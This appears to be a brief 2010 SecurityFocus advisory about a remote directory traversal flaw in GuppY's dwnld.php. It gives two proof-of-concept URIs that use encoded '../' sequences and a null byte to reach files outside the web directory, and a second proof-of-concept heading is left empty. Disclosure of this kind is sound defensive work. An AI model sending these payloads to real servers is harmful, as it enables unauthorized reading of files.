GuppY Dwnld.PHP Remote Directory Traversal Vulnerability

This issue can be exploited through use of a web client.

The following proof of concept URI are available:
http://www.example.com/guppy/mobile/dwnld.php?pg=./%2E./stats
http://www.example.com/guppy/dwnld.php?pg=./%2E./test.inc%00

The following proof of concept is available:


 

Privacy Statement
Copyright 2010, SecurityFocus